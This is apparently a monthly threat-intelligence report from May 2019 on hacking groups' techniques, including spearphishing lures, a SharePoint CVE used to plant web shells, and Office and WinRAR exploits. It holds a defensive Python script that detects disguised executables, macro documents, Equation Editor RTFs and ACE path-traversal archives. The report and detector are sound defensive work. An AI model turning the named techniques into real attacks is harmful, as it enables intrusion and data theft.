MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

Drive-by Compromise
Exploit Public-Facing Application
Spearphishing Attachment
Spearphishing Link
Valid Accounts

Execution

Command-Line Interface
Compiled HTML File
Control Panel Items
Execution through API
Execution through Module Load
Exploitation for Client Execution
Mshta
PowerShell
Regsvr32
Rundll32
Scheduled Task
Scripting
Service Execution
Signed Script Proxy Execution
Trusted Developer Utilities
User Execution
Windows Management Instrumentation

Persistence

Component Object Model Hijacking
DLL Search Order Hijacking
Hidden Files and Directories
Modify Existing Service
New Service
Office Application Startup
Registry Run Keys / Startup Folder
Scheduled Task
Valid Accounts
Web Shell

Privilege Escalation

Bypass User Account Control
DLL Search Order Hijacking
Exploitation for Privilege Escalation
New Service
Process Injection
Scheduled Task
Valid Accounts
Web Shell

Defense Evasion

Binary Padding
Bypass User Account Control
Compiled HTML File
Component Object Model Hijacking
Control Panel Items
Deobfuscate/Decode Files or Information
DLL Search Order Hijacking
DLL Side-Loading
File Deletion
File Permissions Modification
Hidden Files and Directories
Indicator Removal on Host
Masquerading
Modify Registry
Mshta
NTFS File Attributes
Obfuscated Files or Information
Process Injection
Regsvr32
Rundll32
Scripting
Signed Script Proxy Execution
Software Packing
Template Injection
Timestomp
Trusted Developer Utilities
Valid Accounts
Virtualization/Sandbox Evasion
Web Service

Credential Access

Credential Dumping
Input Capture
Network Sniffing

Discovery

Account Discovery
File and Directory Discovery
Network Service Scanning
Network Sniffing
Process Discovery
Query Registry
Remote System Discovery
System Information Discovery
System Network Configuration Discovery
System Network Connections Discovery
System Owner/User Discovery
Virtualization/Sandbox Evasion

Lateral Movement

Application Deployment Software
Distributed Component Object Model
Exploitation of Remote Services
Pass the Hash
Pass the Ticket
Remote File Copy
Windows Admin Shares

Collection

Automated Collection
Data from Local System
Input Capture
Man in the Browser
Screen Capture

Command and Control

Commonly Used Port
Custom Command and Control Protocol
Data Encoding
Data Obfuscation
Domain Generation Algorithms
Multi-Stage Channels
Multiband Communication
Remote File Copy
Standard Application Layer Protocol
Uncommonly Used Port
Web Service

Exfiltration

Data Compressed
Data Encrypted
Exfiltration Over Alternative Protocol
Exfiltration Over Command and Control Channel

Impact

Transmitted Data Manipulation

Monthly Threat Actor Group Intelligence Report, May 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from April 21 to May 20, 2019.

1. SectorA Activity Features

Four SectorA hacking groups, SectorA01, SectorA02, SectorA05 and SectorA07, were observed this May. Analysis of the SectorA groups' campaigns over a long period shows that SectorA02, SectorA05 and the newly defined SectorA07 are the most active. The increased activity of these three groups means that the strategy, purpose and direction of the SectorA groups as a whole have become clearer, as have the goals of each individual group.

In the past, the SectorA02 and SectorA05 groups conducted hacking campaigns to collect high-level information related to Korea. These groups are now also conducting campaigns to gather information on political activities in Europe, North America and Southeast Asia, regions containing countries that can influence the political and diplomatic activities of the SectorA government.

SectorA07, newly defined in May, is a small subgroup of the larger existing SectorA05 group. Analysis of its hacking campaigns shows that the SectorA07 group is active solely for the purpose of collecting financial information from companies located in South Korea and Southeast Asian countries.

The SectorA02 group uses the most diverse hacking strategies and techniques in SectorA, ranging from simple phishing attacks and spear phishing attacks carrying malware to sophisticated social engineering via KakaoTalk (a popular messenger in South Korea). SectorA05 and SectorA07, on the other hand, rely on spear phishing for initial access, as they frequently did in the past, and choose between Microsoft Word and HWP file format malware depending on the target victim.

We observe that SectorA is targeting specific countries less and is now gathering political and economic information on various countries related to the SectorA government, while also capturing financial information in a wide range of non-specific countries and regions.

2. SectorB Activity Features

SectorB groups are conducting campaigns in various countries around the world. In May, a total of four hacking groups were found to be active in SectorB.

In the Middle East and Southeast Asia, activity of the SectorB01 group, which had been low over the preceding period, has started to increase. The SectorB01 group used Microsoft Word files containing code execution vulnerabilities to execute malware. These files were attached to spear phishing emails, a technique frequently used by other SectorB groups in the past. In May, the SectorB01 group was also found using malware that runs on Linux, suggesting they are preparing capabilities for attacks on a range of operating systems.

The SectorB03 group, mainly active in North America, used the remote code execution vulnerability CVE-2019-0604 to attack Microsoft SharePoint servers, a vulnerability not previously used by other hacking groups. They exploited it to upload a WebShell to the target server and then penetrate the internal network.

The SectorB09 group mainly operates in East Asia, and its malware shares characteristics with that used in the past. However, they have adopted a new technique: masquerading malware as the setup file of a commercial cloud service and then distributing it to specific targets.

The SectorB16 group, active mainly in Europe and Southeast Asia, uses only open source tools and known existing vulnerabilities. This characteristic makes their hacking activity more difficult to detect.

SectorB groups are likely conducting hacking activities to seize relevant diplomatic information as part of the recent trade war with the United States. As a result, the frequency of SectorB hacking campaigns is expected to increase.

3. SectorC Activity Features

In May, a total of three hacking groups were found among the SectorC groups. They perform hacking activities mainly in Europe, South America and Eastern Europe, where political friction is frequent.

The SectorC01 group mainly used malware recently written in the Go language this month. This appears to be a strategic choice, since Go offers cross-platform portability and wide applicability.

The SectorC02 group installs information-collecting malware which targets Microsoft Exchange Servers. This is similar to malware used in hacking campaigns in countries located in Europe in the past, and seems to be aimed at stealing e-mail information that can be used for various purposes.

The SectorC08 group conducts intensive hacking activities targeting countries in Eastern Europe where political friction continues. The malicious code found in May took the form of a 7-Zip self-extracting archive (7ZipSFX), bundling script files together with known legitimate files. This matches SectorC08 activity observed in the past.

4. SectorD Activity Features

In May, a total of two hacking groups were found among the SectorD groups. They perform hacking activities mainly against other Middle Eastern countries with which they have political tensions.

The SectorD01 group mainly conducted hacking activities for information collection, using spear phishing emails with Microsoft Excel files containing malicious macros, as well as malware built on AutoHotKey and TeamViewer, neither of which the group had used before.

The SectorD02 group also conducted hacking campaigns in the Middle East, using spear phishing with malware for initial access, like most other Sector groups. Recently they have used open-source penetration testing tools in their attacks, which appears to be an attempt to avoid leaving attributable traces of their activity.

5. SectorE Activity Features

In May, a total of three hacking groups were found among the SectorE groups. They perform hacking activities mainly against rival countries in Central Asia, including Pakistan.

The SectorE02 group typically used spear phishing emails with an attached Microsoft Excel document with malicious macro scripts for initial access.

The SectorE05 group also used malicious Microsoft Word files, each embedding two OLE-structured objects and two files with executable file structures.

Hacking campaigns of the SectorE groups have concentrated on rival countries following an armed conflict with a political rival. Given this political situation, the hacking campaigns of SectorE groups are expected to continue.

6. SectorF Activity Features

In May, the SectorF01 group mainly operated against China, Thailand, Cambodia and India. Hacking campaigns targeting Japanese automotive companies located in Southeast Asia were also found.

The SectorF01 group consistently uses a variety of attack methods: executable files disguised with document file icons, MS Word documents containing VBA macro scripts, RTF files exploiting CVE-2017-11882, and the WinRAR ACE vulnerability (CVE-2018-20250). The purpose of the group's recent activity appears to differ from the past: in addition to political and military information, they now also target various countries and organizations for the economic development of their own country.
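The four lure types listed above can be triaged offline by checking what a file actually is against what its name and extension claim. The script below is an added example written for this page, not code from NSHC or from the report; the files it builds in memory are constructed stand-ins (a fake PE header, a minimal RTF carrying the Equation Editor 3.0 CLSID, a macro-enabled OOXML archive and a byte string with the ACE signature), not real malware, and the ACE path check is a coarse string heuristic rather than a full ACE parser.

```python
"""Triage helper for the SectorF01 lure types: executables disguised as documents,
macro-enabled Office files, RTFs carrying an Equation Editor object (CVE-2017-11882)
and ACE archives (CVE-2018-20250 in WinRAR's UNACEV2.DLL).
Added illustrative code, not from the NSHC report; all sample inputs are constructed."""
import io
import re
import zipfile

DOC_EXTENSIONS = (".doc", ".docx", ".xls", ".xlsx", ".rtf", ".pdf", ".hwp", ".txt")
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy Office compound file header
# CLSID of the Equation Editor 3.0 COM server (EQNEDT32.EXE), the component
# patched for CVE-2017-11882; RTF lures carry it as this hex string in \objdata.
EQNEDT_CLSID = b"0002ce020000000000c000000000000046"
# Coarse heuristic for CVE-2018-20250-style entries: an absolute Windows path or
# directory traversal inside the archive bytes. Not an ACE format parser.
ACE_PATH_RE = re.compile(rb"(?:[A-Za-z]:\\|\.\.\\)[\x20-\x7e]{1,200}")


def find_indicators(name: str, data: bytes) -> list:
    """Return indicator labels for one file; an empty list means nothing was found."""
    hits = []
    lname = name.lower()
    low = data.lower()

    # 1. PE executable hiding behind a document extension or a double extension.
    if data[:2] == b"MZ":
        if lname.endswith(DOC_EXTENSIONS):
            hits.append("pe_with_document_extension")
        elif lname.rsplit(".", 1)[0].endswith(DOC_EXTENSIONS):
            hits.append("pe_with_double_extension")
        return hits

    # 2. RTF embedding an Equation Editor object; \objupdate forces it to load on open.
    if data[:4] == b"{\\rt":
        if EQNEDT_CLSID in low or b"equation.3" in low:
            hits.append("rtf_equation_editor_object")
        if b"\\objupdate" in low:
            hits.append("rtf_objupdate_autoload")

    # 3. OOXML (docx/xlsx/docm/xlsm) is a zip; a VBA project lives in vbaProject.bin.
    if data[:2] == b"PK":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                if any(n.lower().endswith("vbaproject.bin") for n in zf.namelist()):
                    hits.append("ooxml_vba_project")
        except zipfile.BadZipFile:
            hits.append("malformed_zip")

    # 4. Legacy OLE document: directory entry names are UTF-16LE, so check both forms.
    if data[:8] == OLE_MAGIC:
        if b"_VBA_PROJECT" in data or "_VBA_PROJECT".encode("utf-16-le") in data:
            hits.append("ole_vba_project")

    # 5. ACE archive: the main header carries "**ACE**" at offset 7.
    if data[7:14] == b"**ACE**":
        hits.append("ace_archive")
        if ACE_PATH_RE.search(data):
            hits.append("ace_suspicious_entry_path")

    return hits


def triage(files: dict) -> dict:
    """Map each filename to its indicator list."""
    return {name: find_indicators(name, data) for name, data in files.items()}


def build_samples() -> dict:
    """Constructed sample files (not real malware), keyed by filename."""
    docm = io.BytesIO()
    with zipfile.ZipFile(docm, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/vbaProject.bin", b"\x00" * 16)
    rtf = (b"{\\rtf1{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
           b"{\\*\\objdata 01050000020000000b0000004571756174696f6e2e3300"
           + EQNEDT_CLSID + b"}}}")
    ace = (b"\x00" * 7 + b"**ACE**" + b"\x00" * 16
           + b"C:\\Users\\Public\\Start Menu\\Programs\\Startup\\update.exe")
    return {
        "policy_brief.pdf": b"%PDF-1.4\n%clean document\n",
        "report.doc.exe": b"MZ" + b"\x00" * 62,
        "thesis_feedback.rtf": rtf,
        "report.docm": docm.getvalue(),
        "media_kit.ace": ace,
    }


if __name__ == "__main__":
    for fname, found in triage(build_samples()).items():
        print(f"{fname:22s} {', '.join(found) or 'no indicators'}")
```

Each check keys on the file's real format rather than its name, so a renamed PE or an RTF saved as .doc is still caught; in practice the same logic is worth running on attachments at the mail gateway as well as on extracted archive contents.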

This type of activity resembles previous attempts by another sector, SectorB, to collect technology information from Western countries in order to advance its own technology and economic development. The SectorF01 group is therefore expected to continue targeting developed countries and high-technology industries for these purposes.

7. Cyber Crime Groups Activity Features

Hacking groups included in SectorJ are those that perform high-profile cyber crime activities to seize financial information that can generate economic profit. In May, a total of two hacking groups were found among these cyber crime groups, with activity spread across a wide range of regions.

The hacking activities of the SectorJ04 group were mainly found in Italy, Korea, Romania, South Africa and India, targeting major companies in the financial industry such as banks. The group mainly uses malware in the form of MS Excel files containing macro scripts, and employs different malware and strategies across Europe and Asia.

The observed SectorJ09 group activities aimed at hijacking credit card payment information from e-commerce platforms used by online stores in North America and by universities in the US and Canada.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.